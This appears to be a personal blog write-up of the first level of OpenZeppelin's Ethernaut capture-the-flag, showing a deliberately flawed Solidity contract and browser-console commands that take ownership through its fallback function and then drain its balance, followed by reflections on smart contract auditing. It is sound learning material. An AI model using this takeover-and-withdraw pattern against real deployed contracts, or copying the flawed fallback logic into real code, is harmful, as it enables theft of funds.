Motivations

I am on my way to explore the world of blockchain security and this article was written as a guide for me to document my learnings. It explores the first level of a simple CTF programme by openZepellin designed to help testers to understand common vulnerabilities in blockchain smart contracts.

Overview

The Ethernauth CTF teaches you the basic idea of blockchain audit. The idea is to take ownership of the smart contract. This happens when we make a contribution to the wallet by invoking the fallback(). There is a logic flaw in the fallback() that makes the player the owner of the smart contract, once attacker had owned it, player can withdraw funds from the smart contract completely. The fallback() is invoked when the contracts receives ether or when an unknown function method is called. You will need to examine the smart contract Solidity code below for the logic flaw (highlighted in yellow):

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Fallback {

  using SafeMath for uint256;
  mapping(address => uint) public contributions;
  address payable public owner;

  constructor() public {
    owner = msg.sender;
    contributions[msg.sender] = 1000 * (1 ether);
  }

  modifier onlyOwner {
        require(
            msg.sender == owner,
            "caller is not the owner"
        );
        _;
    }

  function contribute() public payable {
    require(msg.value < 0.001 ether);
    contributions[msg.sender] += msg.value;
    if(contributions[msg.sender] > contributions[owner]) {
      owner = msg.sender;
    }
  }

  function getContribution() public view returns (uint) {
    return contributions[msg.sender];
  }

  function withdraw() public onlyOwner {
    owner.transfer(address(this).balance);
  }

  fallback() external payable {
    require(msg.value > 0 && contributions[msg.sender] > 0);
    owner = msg.sender;
  }
}

Here are the steps:

1. Use Firefox, load https://ethernaut.openzeppelin.com/

2. Install Metamask

3. Complete "0. Hello Ethernaut"

4. Go to "1. Fallback"

5. Click "Get New Instance"

6. Using Inspect Element (Ctrl-Shift-C), Click on Console

7. Check contract owner & player address, notice that both are different, the goal is to pwn the contract owner:

await contract.owner()

< - "0x9CB391dbcD447E645D6Cb55dE6ca23164130D008"

8. Check player address:

>> player

<- "0x9Aa43DEA4b71E291c22f35f46Cf28Df60D19Ca15"

9. Check the players' contribution, Array should be 0:

>> await contract.contributions(player)

10. Make a contribution of value = 1, metamask should load, confirm the transaction:

>> await contract.contribute({value:1})

11. Send it, metamask will pop up again:

>> await contract.sendTransaction({value:1})

12. Finally, check the contract owner address, it should be yours!

>> contract.owner()

<value>: "0x9Aa43DEA4b71E291c22f35f46Cf28Df60D19Ca15"

>> player

13. Time to drain the wallet since you now own the contract, metamask will appear twice, click confirm:

>> await contract.withdraw()

14. Click on Submit instance and confirm metamask transaction, you are done!

15. Game Over!

Closing Summary

There exist logic flaws in smart contracts that can be exploited by an attacker to completely drain the wallet. A smart contract audit should be able to identify the flaw by interacting with the smart contract. In this CTF, testing was done via a browser console, however, there exist other more intricate ways of buidling a virtual blockchain env for comprehensive testing of various smart contracts. Smart contracts are written in Solidity language, a tester should have knowledge in debugging this language with great attention to fine detail, the idea is to spot flaws in the smart contract that could be exploited by black hats. I believe the approach is similar to white box testing where a tester examines the code and runs it thru a series of debuggers designed to weed out bugs that could impact the security and integrity of the smart contract. Smart contract auditing is still a new thing but there are a few companies offering services for major Crypto companies looking to secure their blockchain contracts. I forsee that this skill will become more important for Cyber security professionals to master as blockchain technology in particularly used in Defi services are becoming more popular.